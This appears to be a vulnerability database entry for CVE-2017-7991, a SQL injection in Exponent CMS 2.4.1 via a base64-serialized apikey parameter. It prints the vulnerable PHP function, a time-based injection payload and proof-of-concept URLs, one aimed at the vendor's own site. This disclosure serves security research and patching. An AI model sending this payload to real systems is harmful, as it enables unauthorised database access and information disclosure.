Exponent CMS 2.4.1 SQL Injection

🗓️ 21 Apr 2017 00:00:00Reported by 404 Not FoundType

packetstorm🔗 packetstormsecurity.com👁 46 Views

Exponent CMS 2.4.1 SQL injection via api function in eaasController.ph

Reporter	Title	Published	Views	Family All 8
0day.today	Exponent CMS 2.4.1 SQL Injection Vulnerability	21 Apr 201700:00	–	zdt
CNVD	Multiple SQL Injection Vulnerabilities in OIC Exponent CMS	26 Apr 201700:00	–	cnvd
Check Point Advisories	Exponent CMS eaasController.php api Function SQL Injection (CVE-2017-7991)	9 May 201700:00	–	checkpoint_advisories
CVE	CVE-2017-7991	22 Apr 201701:00	–	cve
Cvelist	CVE-2017-7991	22 Apr 201701:00	–	cvelist
EUVD	EUVD-2017-16961	7 Oct 202500:30	–	euvd
NVD	CVE-2017-7991	22 Apr 201701:59	–	nvd
Prion	Sql injection	22 Apr 201701:59	–	prion

`CVE-2017-7991-SQL injection-Exponent CMS  
  
[Suggested description]  
Exponent CMS 2.4.1 and earlier has SQL injection via a base64  
serialized API key (apikey parameter) in the api function of  
framework/modules/eaas/controllers/eaasController.php.  
  
------------------------------------------  
  
[Additional Information]  
Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php  
Vulnerable function is api.  
  
public function api() {  
if (empty($this->params['apikey'])) {  
$_REQUEST['apikey'] = true; // set this to force an ajax reply  
$ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);  
$ar->send(); //FIXME this doesn't seem to work correctly in this scenario  
} else {  
echo $this->params['apikey'];  
$key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));  
echo $key;  
  
$cfg = new expConfig($key);  
$this->config = $cfg->config;  
if(empty($cfg->id)) {  
$ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);  
$ar->send();  
} else {  
if (!empty($this->params['get'])) {  
$this->handleRequest();  
} else {  
$ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);  
$ar->send();  
}  
}  
}  
}  
  
We can control param $apikey by using base64_encode and serialize  
functions to encrypt the SQL injection string. Then, the $apikey will  
be decrypted and cause SQL injection. Such as, if we want to use  
"aaa\'or sleep(2)#" to inject, we should use "echo  
base64_encode(serialize($apikey));" to encrypt the Attack string:  
czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,  
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7  
is the PoC. The result is: the site will sleep several seconds, and  
you can see SQL injection is successful in MySQL logs.  
  
------------------------------------------  
  
[Vulnerability Type]  
SQL Injection  
  
------------------------------------------  
  
[Vendor of Product]  
Exponent CMS  
  
------------------------------------------  
  
[Affected Product Code Base]  
Exponent CMS - 2.4.1 and earlier  
  
------------------------------------------  
  
[Affected Component]  
\framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey  
  
------------------------------------------  
  
[Attack Type]  
Remote  
  
------------------------------------------  
  
[Impact Information Disclosure]  
true  
  
------------------------------------------  
  
[Attack Vectors]  
http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7  
  
http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7  
  
------------------------------------------  
  
[Discoverer]  
404notfound  
  
  
`

21 Apr 2017 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.01354